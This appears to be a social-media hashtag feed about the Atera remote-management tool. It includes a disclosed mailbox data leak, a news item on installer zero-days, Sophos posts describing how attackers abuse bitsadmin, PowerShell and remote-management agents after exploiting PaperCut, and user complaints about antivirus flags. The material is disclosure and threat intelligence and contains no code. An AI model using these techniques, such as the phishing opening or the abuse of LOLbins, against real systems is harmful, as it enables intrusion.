fyrMay 9, 2025

I noticed a (minor but abusable) data leak in the RMM/PSA tool Atera a while ago, reported it and it's now fixed. I think it's somewhat interesting so I wrote it up.

https://fyr.io/post/atera-leaked-their-customers-to-mailinator

Tldr: if you tested your SMTP settings, it used a public mailbox on mailinator, allowing anyone to watch for (and respond to, if you're so inclined) mail. Phishing opportunity!

#infosec #atera #privacy #dataleak #mailinator #writeup #phishing #netsec

Scraps

Scrappy notes on cool and interesting stuff I've seen online from the last little while

Show threadKasionApr 23, 2024
@acrypthash How you liking #ninjaone? We just moved from #connectwise automate to #atera and never been happier.
πŸ›‘ [email protected]/:~# β€‹Jul 25, 2023

"⚠️ Critical Zero-Days in Atera Windows Installers Expose Users to Privilege Escalation Attacks ⚠️"

Zero-day vulnerabilities in Windows Installers for the Atera software could lead to privilege escalation attacks. Patch now!

Source: [The Hacker News](https://thehackernews.com/2023/07/critical-zero-days-in-atera-windows.html)

Tags: #Atera #Windows #ZeroDay #PrivilegeEscalation #CyberSecurity πŸš¨πŸ”“πŸŒ

Critical Zero-Days in Atera Windows Installers Expose Users to Privilege Escalation Attacks

Zero-day vulnerabilities found in Atera remote monitoring software's Windows Installers can lead to privilege escalation attacks

The Hacker News
Show threadSophos X-OpsApr 27, 2023

The #SophosMDR team also discovered cases where threat actors targeting #PaperCut were abusing the bitsadmin.exe Windows application to download payloads. #BITSAdmin is commonly abused by active adversaries as a "living off the land binary" or #LOLbin, handy for accomplishing the task of downloading payloads.

The tools exploited in the attacks have included what we refer to as β€œdual-use agents,” used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of #AnyDesk, #Atera, #Synchro, #TightVNC, #NetSupport, and #DWAgent remote management tools across multiple campaigns.

4/6

Show threadSophos X-OpsApr 27, 2023

Post-exploitation activity targeting #PaperCut often results in #PowerShell commands being executed by the pc-app.exe parent process. We've collected logs of the affected system downloading #Atera remote monitoring software to the victim. (Atera is, of course, legitimate software, being abused by the attackers in this situation.)

Different threat groups are abusing PowerShell in different ways. One group calls PowerShell commands directly, as shown here. This particular attacker delivered a ransomware binary that was hosted on the ephemeral file host #tmpfiles (files hosted there are deleted from the server after 60 minutes):

3/6

Show threadPatrick LabbettNov 17, 2022
Thank you for contacting #Atera #support. We are currently experiencing issues with Windows #Defender #flagging the Atera agents as #malicious.
This is to let you know that we are currently investigating and trying to find a solution for this issue.
Patrick LabbettNov 17, 2022
Well #atera got #flagged globally by #defender and it's going to be a long fucking day.